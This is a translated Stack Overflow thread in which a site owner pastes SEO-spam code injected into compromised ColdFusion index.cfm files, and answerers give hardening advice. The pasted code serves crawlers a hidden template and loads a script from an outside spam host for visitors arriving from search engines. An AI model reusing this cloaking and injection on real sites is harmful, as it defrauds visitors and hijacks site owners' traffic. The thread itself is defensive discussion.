【问题标题】:Aargh! Coldfusion sites are being hacked啊! Coldfusion网站被黑客入侵
【发布时间】:2013-11-28 10:36:01
【问题描述】:

当有人进行 google 搜索时,我们的一些coldfusion 网站会被重定向到mulberry 网站。有没有办法防止这种情况?他们一开始是怎么做的?看起来这段代码正在被插入到 index.cfm 中:

<cffunction name="isSpider" returntype="boolean">

    <cfif reFindNoCase("(bot|crawl|spider|slurp|yahoo|sohu-search|lycos|robozil la)", cgi.http_user_agent)>

        <cfreturn true />

    <cfelse>

        <cfreturn false />

    </cfif>

</cffunction>



<cffunction name="isEngine" returntype="boolean">

    <cfif reFindNoCase("(google|bing|aol|search|baidu|yahoo|sogou|soso|live|you dao|so)", cgi.http_referer)>

        <cfreturn true />

    <cfelse>

        <cfreturn false />

    </cfif>

</cffunction>



<cffunction name="isPage" returntype="boolean">

    <cfif reFindNoCase("(index.|default.|main.)", cgi.script_name)>

        <cfreturn true />

    <cfelse>

        <cfreturn false />

    </cfif>

</cffunction>



<cfif isSpider() and isPage()>

    <cfcontent reset="true" />

    <cffile action="read" file="#expandPath("/images/log.gif")#" variable="tpl" />

    <cfoutput>#tpl#</cfoutput>

    <cfabort />

</cfif>



<cfif isEngine() and isPage()>

    <cfcontent reset="true" />

    <script src="http://www.shopsnapbackhatus.com/jie/mulberry.gif" type="text/javascript" charset="utf-8"></script>

    <cfabort />

</cfif>

【问题讨论】:

  • 这不是一个编程问题,对于 SO 来说是题外话。但是,为了防止它,您应该从安装 Adob​​e 提供的修补程序开始,并阻止所有/大部分 /CFIDE 通过网络访问。还有很多事情要做 - 查找 Charlie Arehart 的网站,您会发现一大堆信息。

标签: redirect coldfusion code-injection


【解决方案1】:

你没有提到 CF 的哪个版本,也没有提到是 IIS 还是 apache 等(又是哪个版本)等等。

攻击可能来自多个向量,根据他们正在积极向模板编写代码的事实判断,很可能存在某些描述的后门。即使您找到了入口点,除非您可以说“是的,就是这个”并修补它,否则它不会有任何好处。你的 CF 是最新的吗?

从这里开始:http://hackmycf.com/

然后看看你的模板 - 我敢打赌那里有一些不应该的 .cfm 文件。你有备份吗?比较一下(然后回溯几个月——很多入侵尝试提前访问,暂时搁置,然后开始做事)。

就个人而言,我会考虑擦除并重新开始以绝对确定,但即便如此,您也需要检查您重新部署的代码是 100% 安全的,并且环境已完全修补,并且您确实找到了初始代码原因。

【讨论】:

    【解决方案2】:

    首先

    1. 这可能是由于 google 或其他搜索引擎而不是检查您的代码。
    2. 应用来自 ColdFusion 的当前补丁。
    3. 请确保您正在使用所有查询,因为 SQL 注入很可能是导致此问题的原因。
    4. 不要忘记 XSS 攻击。如果这些网站采用公开显示的用户输入,则首先对您的网站进行适当的用户输入编码。
    5. 查看 ColdFusion 锁定指南(请根据您的 Coldfusion 版本选择)http://www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf

    以上所有方法都使用任何商业或开源工具(我喜欢 Zad Attack Proxy)对您的所有网站(如果您正在管理它)执行漏洞测试。

    在执行上述所有操作之前,请检查您现有的数据库中是否存在杂项代码(通常是 javascript 标记)并进行更正。

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 2015-12-06
      • 2011-06-03
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 2018-09-26
      • 2017-02-01
      相关资源
      最近更新 更多